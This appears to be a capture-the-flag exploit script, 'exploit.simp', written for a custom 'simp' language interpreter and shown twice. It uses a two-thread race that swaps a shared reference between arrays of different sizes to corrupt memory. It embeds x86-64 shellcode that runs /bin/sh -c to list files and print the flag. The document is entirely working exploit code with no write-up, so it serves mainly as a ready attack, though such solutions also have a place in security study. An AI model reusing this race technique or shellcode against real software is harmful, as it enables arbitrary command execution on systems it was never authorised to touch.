ptr-yudai/exploit.simp

## exploit.simp
array<uint64> a = make_array<uint64>(4);
array<uint64> b = make_array<uint64>(3);
ref<array<uint64>> victim = new<array<uint64>>();

string shellcode = "\x31\xd2\x52\xe8\x1c\x00\x00\x00\x2f\x62\x69\x6e\x2f\x6c\x73\x20\x2d\x6c\x68\x61\x3b\x20\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67\x00\xe8\x03\x00\x00\x00\x2d\x63\x00\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5f\x57\x48\x89\xe6\xb8\x3b\x00\x00\x00\x0f\x05\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05";

def void race() {
	int64 i = 0;
	while(1) {
		deref(victim) = a;
		if (i < 0) { print(victim); }
		deref(victim) = b;
		if (i < 0) { print(victim); }
		i = i + 1;
	}
}

def int32 main() {
	set_max_native_threads(2);
	thread t = make_thread(race);

	deref(victim) = a;
	while(1) {
		ref<uint64> pp = new<uint64>(4291152);
		deref(victim)[2] = deref(pp);
		print(victim);
		print("\n");
		usleep(1);
	}
	return 0;
}
	array<uint64> a = make_array<uint64>(4);
	array<uint64> b = make_array<uint64>(3);
	ref<array<uint64>> victim = new<array<uint64>>();

	string shellcode = "\x31\xd2\x52\xe8\x1c\x00\x00\x00\x2f\x62\x69\x6e\x2f\x6c\x73\x20\x2d\x6c\x68\x61\x3b\x20\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67\x00\xe8\x03\x00\x00\x00\x2d\x63\x00\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5f\x57\x48\x89\xe6\xb8\x3b\x00\x00\x00\x0f\x05\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05";

	def void race() {
	int64 i = 0;
	while(1) {
	deref(victim) = a;
	if (i < 0) { print(victim); }
	deref(victim) = b;
	if (i < 0) { print(victim); }
	i = i + 1;
	}
	}

	def int32 main() {
	set_max_native_threads(2);
	thread t = make_thread(race);

	deref(victim) = a;
	while(1) {
	ref<uint64> pp = new<uint64>(4291152);
	deref(victim)[2] = deref(pp);
	print(victim);
	print("\n");
	usleep(1);
	}
	return 0;
	}